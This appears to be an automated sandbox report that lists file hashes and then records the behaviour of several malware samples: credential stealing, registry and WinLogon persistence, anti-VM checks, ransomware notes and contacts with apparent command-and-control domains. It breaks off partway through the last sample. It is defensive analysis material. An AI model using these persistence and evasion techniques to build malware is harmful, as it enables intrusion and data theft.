C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

MD5 0a2977acc4e3560744244b7cbc497eda
SHA1 1cf8fef49e96008cf9403fa3bcc090cf26d154a9
SHA256 1d6e2d40d8962b3b96d5c50482c7f09b48cea06630a8e79b9b6551cc347c8638
SHA512 8f624cd51f49f1a74edd5465c7c3f4307afddd3fa6dedff1f1c0847dc10041881d5c4b0d75ec39da6499566f8e143f8d1f2998b4d25a9f2fca0b5d27891706e5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

MD5 983b4875e0028e8f008c6ec0ab8381f0
SHA1 381e4d70353b3a167a432879265a116bcca3e962
SHA256 274a750cd51f8786bf5731ecfadbcd4fabbcd38cc501b483b0e9ec1d0de18344
SHA512 04c0794bcee45558bb9f7d86e06cd85c5c98477ccb65151c81d9bcba39d2d5ad39cda2228bb08f6ed53ead64fd07a897120e08d8c383701cb0cce6bdf4e59c6d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF

MD5 94ab1d7d7d835d2622b8e944fde99909
SHA1 1c5e12d48e18257b503bff391fa744dfcb93b589
SHA256 f9d0526b2b694d025cf67d99254387c2e0d3848786d7c1ed0aa6bb36fda11e08
SHA512 4e6598b63d021c7bf33d6a0ef229944b5f41cb98289390593503957ef20e8051124c097fc82147cf6f5d5ec00c3c9fa343b506bf0bc46cf5a3451dcbcd303b75

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF

MD5 b92eea701474e53118121e86c4036bce
SHA1 002fe90bf7e448af7f26bcccc130cd1625c53583
SHA256 50551988f7bffd873929cd3591e8b1431558955e6ea0ad6dac706bbf1f3a03d1
SHA512 a9ed6060494b7cd43955899026e5c2e4f98f6be70055ce7a98492752b56cddb3483d58ad8064dcb84b5d58e31c4d3b7848f7588b69986cfdc3e2edd47ed1490a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF

MD5 c703c338fe74b0b88f22f0775a325c39
SHA1 8f07a7294797faf2d259b98573f0479bb0d8d85a
SHA256 e0b3214c217ee99ca5992236e599e59f3c5613b9ffc05f4b094232261948a0dc
SHA512 da5cd0c1999bdf854e4f818d0e4af89b7b57d4ec22cb254b3ea6bfabf7f3ba80a7658406d86eca57135cc5a0bed42a8d3dcfcedf7765f8cfb1c9f2a5cf26ff73

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF

MD5 db4f6ca1582690e6f6efb57613ba5b36
SHA1 5244d1dec5cda976f848bfaa7f7be38e0c7a6b19
SHA256 63212f74691529483a97c1e24fde1e092a9354b0de65a90140537004c029ccfc
SHA512 db1aa0f2320056e21cd3c4f09e84789fc06643cdde12ee2a50f5f046df39b98289a96cfd963f1bcd8397a711e510fa1c27adf41f6408d11ec2e030675dcbaa4f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF

MD5 bb39d747337310f374f2eb9fad53b7d4
SHA1 980928f38dcebcd02f4d24aef644309369d1a9ac
SHA256 8af7331b547bd25ee1a6a76cb5ec4f3d4c8487a1ef9d934a4c2c43a3f0cddd3b
SHA512 fe58dbca88cd5320897b05c45846f0a1e7d84d7232ec906a9b0a3616d2140eac06309e8b76a1982dd36ef04fae89ee2497380d6eddddde8f2123464172f3dd06

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF

MD5 49709e2982d15fc59dd453762943cb78
SHA1 e6a2568f1a0941420e63f30ad2fed295a7aa80f9
SHA256 5411026d13b25b541d98554422a112ec19a9c525d3b915c28de0e8ba755b14cf
SHA512 89a6a5e8ef720186b2dbd41f152562f31c5db321e555d599e1bb4604df920ab9b1e8cd98f1aea02614b2da91bbf3503e4a12fa989481f70fa6d20c24906331ac

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif

MD5 0a0386e072d54f6f575c4490647921e1
SHA1 88d3dd8d7636eb87370d2660a7f7525500ad2993
SHA256 a0ed803c79be15937007195fecebf222e256fa7f8aa9d93a72fd4b3293f8893b
SHA512 acfc3f04c9a0280d00b33451cbea5918236f53098ed805f3c3d5bb6e15f20d1f596f0e6b192e9c787562e58babb9136247051bc67d072d961eda321ed9732f5e

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF

MD5 0c5300cb08265748f1061fc958240e75
SHA1 2df61123d62e92991c725fc5a21b90f67b264cc2
SHA256 19dde572dede505071d1b92443a6f8547a8a47faa64ae7862d5df406aa3651d1
SHA512 48e75b43066a3d9cc4912f9c7c3a8157b8698fe15499a2d706a99a27df8b81ade146eca729bae97283d81a1e247302a279852810ea62d9de473ecbd7a11adc80

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif

MD5 e92f23ed957ddc116b912df99f7d37e3
SHA1 f8d412e5a30529b8dda23712026d1b062843ae73
SHA256 edec601608772c6175756eaccf631b5142c0ab858ca00b9ab4b2e390fa5b8db5
SHA512 880124f9adce776b824fe43c01e98761287de5b8b0b3c5fde8ac2131a86d00730f587695f836a5f968a0cfcdee0f3f13a72ccef9571ec8ff6f9417ccc4519b82

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif

MD5 7e8046c69886eaa56355bea6824878cf
SHA1 fdf50bf8bd76e3c6b5d086f263e703a6348f15b0
SHA256 3220c8a9c345b211339721c1c8d42ae619d3515c42d9af1608e5ace9ed709174
SHA512 df1e4e13e5fd0de2f8bca7bac1939561ca131ff0fb356323b2ad6059f2e834bdf4d68dbb970f645a3cbb40d9fee58ee4311b16847f7a59f8d9438c6f6b16de08

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

MD5 1d840894829a3404e4bd7621e8a458f1
SHA1 5b1f0a1dd735c2d08171a5ade21130ebdfdc29a0
SHA256 72526b92f525eb5e878d0b2097945c2d820a3ee17e40f0b75f9b5b488db37866
SHA512 4d2ab0d1f6a1f5cf40bb5e9af0d2e50487e6188d1ce1f2570fe85b57e2cad72daa0ff6d67d9a8537f95bca800e3de3153083f4f6e6704dedbde27d0125ac23b7

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF

MD5 e9265f3141870eb134a036c8aa958b75
SHA1 dc01b4fe82cfef423fe448238259921a44b5c336
SHA256 fce5045f82bbf3d23e070b64cdce17071db695726672a8c6d40965b473eed8a6
SHA512 fa10e77dc55d067beb0d826c28ea7015946e7238d0137e85c8898e52b646d0ce1701b633b0370cf8e63206e4c17cb19d0489423c7c94a5a713bb48f9df3a44bc

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif

MD5 9f71b43e541891706cc6837144ce1b1a
SHA1 639837ea20667a90400e005bdf5145781580d3ec
SHA256 4ca4cfa3db7ea35e35d7698dd1a95913ee708e8715d3068313fa03046b718ed2
SHA512 b82e4fc6327d7e0f57244caaaace3b6c7da2d319a0a202983c1488a6c5cdf554830c2fc304eeec2aea5ddc7382772b32f35ef30cf5357ae455cf71a5c5d349c0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif

MD5 2b530f1909ef6508468793ca346af87a
SHA1 935d68ce79e38351351d09d5d7841c1bdb18180a
SHA256 35c942a98d878de8e4eefc1e6e9e308d3c6716fbfd2f595785b6b6223289b97e
SHA512 039539c55bd6458b0bd5dba7c0a6fe17d2615fa49a018f7b39a42b42311cfacfa528b2abd59aff85e508d1ec51086547ef3965bab59c5d1d1f9efd0068d7000f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif

MD5 4773860ef2e8e093a305df240d32e441
SHA1 9754d448cb861565ac1b7187f3699f37f81844cc
SHA256 df6bd1ea4ba526fe89845a5b7088c2725951906037be3ece95a1d0065a8afae7
SHA512 a7164d72a593d89ef6102034ae89484b0131cfbeb004ca93664ec46178478fcfc50b9584ca4ffd855000e37643273aaaeb8d010972a7d0ee07edd54c4f22567d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

MD5 b2af7ea47b87d65c87882ddbadfa8007
SHA1 9d80a199d967fbaa241f142855926f9e86c27a8d
SHA256 e4f4e4ccbe43fb4c44e52fde90c54df0090c1ccff517323b151e6fe4a2f835be
SHA512 7ce9377ff7402bacca0567f202619e7684d2cd09e3aa7ab901ee03de64a465ecc9285430dd42289e177cddb61340a6c84ff827c2fa9305154bc5fcb1fed90ba3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

MD5 0a1657a9cb30b999813f9c7e4263c9d3
SHA1 df186e26264921e7aa16b73b00417ad904cc5b1f
SHA256 4c36e153968d37979e51810188cd1d57f9f98251638afcfabc66af8f5b804a51
SHA512 f57432591a91fd5a44f66688c4ea59f73ecbee3a7d6f4dc9c838d16c361cc49ce32257a4448f18c8e30d8f905415d9a8c9860dc9a48f3830ad79d8e9b4a313f1

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF

MD5 ed3efceeb3c5fd9ec313e318834150fa
SHA1 fa85130a4a31b320a5b71c16ee85f5a3f4ea9dc1
SHA256 ebafe72a269f51fd6639b895e320e0b6bea7fb308ec2b9f85cde4fc04132e143
SHA512 371c960fb85435f60bc05b09036ecb1c162f9588e8c1eed39231357c648a3a92a7fe647f3df71feb565c711c74322b1d9ce74b8f71d44226a33fa617791eb16b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

MD5 ce0ff34a7234703bbbc75d035fae79f7
SHA1 a435a053fe6777c7081664337d03188e7a4044d1
SHA256 ad55192cf2dc42053b1a31e55fd94e69ed0207049fa091e19af1d3bd4a1ed4e1
SHA512 efe53dff066bb6a8f9a1b796e0a4a83c655622c0181ac151a6b29d5e0fafeacd1ae38b554b954767077fc1277fe15d1e7c9b63160b89cd2387f59e238ad71d8b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF


Analysis: behavioral20

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe"

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

"C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe"

C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

"C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe"

Network

N/A

Files

memory/1360-0-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-8-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1360-4-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-2-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-12-0x0000000000400000-0x0000000000412000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241023-en

Max time kernel

567s

Max time network

360s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\edffa07d667dbd224682639f56eb1b913e4ffeac874999e02c23e86eeb6489d5.js

Signatures

Pony family

pony

Pony,Fareit

rat spyware stealer pony

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\st.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\Documents\st.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Documents\st.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\edffa07d667dbd224682639f56eb1b913e4ffeac874999e02c23e86eeb6489d5.js argument" C:\Windows\system32\wscript.exe N/A

Checks installed software on the system

discovery

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\st.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Documents\st.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\edffa07d667dbd224682639f56eb1b913e4ffeac874999e02c23e86eeb6489d5.js

C:\Program Files\Windows NT\Accessories\wordpad.exe

"C:\Program Files\Windows NT\Accessories\wordpad.exe" "C:\Users\Admin\Documents\doc_attached_4QAyw"

C:\Users\Admin\Documents\st.exe

"C:\Users\Admin\Documents\st.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 startwavenow.com udp

Files

C:\Users\Admin\Documents\doc_attached_4QAyw

MD5 a1fa80f75ad4003549d27fc726e40b14
SHA1 5fda8ead11d5bdcc51c29f9eb72aed29f2065d31
SHA256 37ab62998175d3dc70763e2fcbfe1e5b38660ae59a1c21c0306f2470ea487364
SHA512 34817bda5cbcb2e0a909d8652b2b82c3471696f4e4d533e8a1e3583811a60aa0365e4ceabd3d2ded506a577decf907bc6bead917ffef1317e758ea2f82c1c554

memory/2008-2-0x0000000002120000-0x0000000002121000-memory.dmp

memory/2008-3-0x0000000002120000-0x0000000002121000-memory.dmp

C:\Users\Admin\Documents\st.exe

MD5 39c27aec900d0613e02b78df2333657c
SHA1 822bf6d0eb04df65c072b51100c5c852761e7c9e
SHA256 dabee7680e09565154e7807c1ed362838ad6ee4e373ee97069e3b33db1ec10f7
SHA512 316497a6973ea6c7883b3112b1d5a7f042f654f807ac8b2919e42719f384469cc5d7d39112982bee0d18900ee6f76dd00664d206f5f13d6448dd27a3c84c1880

memory/2916-10-0x0000000000290000-0x0000000000291000-memory.dmp

memory/2916-9-0x0000000000250000-0x0000000000265000-memory.dmp

memory/2916-11-0x0000000000400000-0x000000000041A000-memory.dmp

memory/2916-12-0x0000000000400000-0x0000000000437000-memory.dmp

memory/2916-13-0x0000000000400000-0x000000000041A000-memory.dmp

memory/2916-14-0x0000000000400000-0x0000000000437000-memory.dmp

memory/2916-15-0x0000000000400000-0x000000000041A000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

550s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ziylmpcea.exe" C:\Windows\SysWOW64\ctfmon.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\ctfmon.exe N/A

Disables Task Manager via registry modification

evasion

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ctfmon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1628 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2332 wrote to memory of 2376 N/A C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe
PID 2376 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe C:\Windows\SysWOW64\ctfmon.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe

"C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe"

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe

C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 397110121001i83455512377.com udp

Files

memory/1628-2-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1628-1-0x0000000000240000-0x0000000000256000-memory.dmp

memory/1628-0-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1628-6-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2332-4-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2332-3-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2332-7-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe

MD5 f45f47edced7fac5a99c45ab4b8c2d54
SHA1 9060189dd95635c5f75d7f91c9bd345200e83028
SHA256 0529cdbc893fee664d3ac540b1e41e184797e0770808254058fc21de0a10b6c8
SHA512 ecf1ae299d0525f86b8c398d06b429164a10d6552caf08710567680ba670bc0c918bfff1807214b33a177202cbe8eeeeffa1396b91e697aed4da91fe81f523d3

memory/2332-17-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2376-19-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2376-18-0x0000000000260000-0x0000000000276000-memory.dmp

memory/1900-22-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2376-23-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2376-24-0x0000000000260000-0x0000000000276000-memory.dmp

memory/1900-25-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/1900-26-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/1900-30-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

598s

Max time network

600s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pr = "C:\\Program Files (x86)\\decrypt_0000000000000020-000A0000.exe" C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\CIVQWTJLSD.BBF C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A
File opened for modification C:\Program Files (x86)\CIVQWTJLSD.BBF C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A
File created C:\Program Files (x86)\decrypt_0000000000000020-000A0000.exe C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A
File opened for modification C:\Program Files (x86)\decrypt_0000000000000020-000A0000.exe C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe

"C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 decimallightness.com udp
US 8.8.8.8:53 craigslistlasvegascars.com udp
US 8.8.8.8:53 deenislam.org udp
HK 34.92.46.178:80 deenislam.org tcp
US 8.8.8.8:53 dentistinnicaragua.com udp
US 8.8.8.8:53 dedhamfoodpantry.org udp
US 192.124.249.157:80 dedhamfoodpantry.org tcp

Files

memory/2428-3-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-4-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-5-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-6-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-7-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-8-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-9-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-10-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-11-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-12-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-13-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-14-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-15-0x0000000000400000-0x00000000004A0000-memory.dmp

memory/2428-16-0x0000000000400000-0x00000000004A0000-memory.dmp


Analysis: behavioral15

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:16

Platform

win7-20240903-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e37dc428ec65a38707ad9e247950f3501a94e4abccb737a3562d69032c8505ad.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e37dc428ec65a38707ad9e247950f3501a94e4abccb737a3562d69032c8505ad.vbs"

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:27

Platform

win7-20240903-en

Max time kernel

357s

Max time network

358s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe"

Signatures

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\READ_THIS_TO_DECRYPT.html C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe

"C:\Users\Admin\AppData\Local\Temp\f6a8d7a4291c55020101d046371a8bda.exe"

Network

N/A

Files

C:\Users\Admin\Documents\READ_THIS_TO_DECRYPT.html

MD5 55764b80badcdfe4337f538993fc3aab
SHA1 049ebb79ca8e78a30318d9eef6b37992572e1034
SHA256 a53779746a2aec49c361f546b70a74508aac83c9ea8203af07f142abfa251b35
SHA512 b8a94d01ad1ca07fd08a890a5b55b71d97d0fc3df705704812c18993872d1ed7360aea6a5fb7e388fd8cedbc2baa7cfabf4207f59becee2927aa1030fa60689b

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:30

Platform

win7-20241010-en

Max time kernel

313s

Max time network

319s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\fb8823e9494016f59ab25ec6cc0961da_api-ms-win-system-softpub-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\fb8823e9494016f59ab25ec6cc0961da_api-ms-win-system-softpub-l1-1-0.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

600s

Max time network

363s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ExtraTools.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\B838.tmp\chrst.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
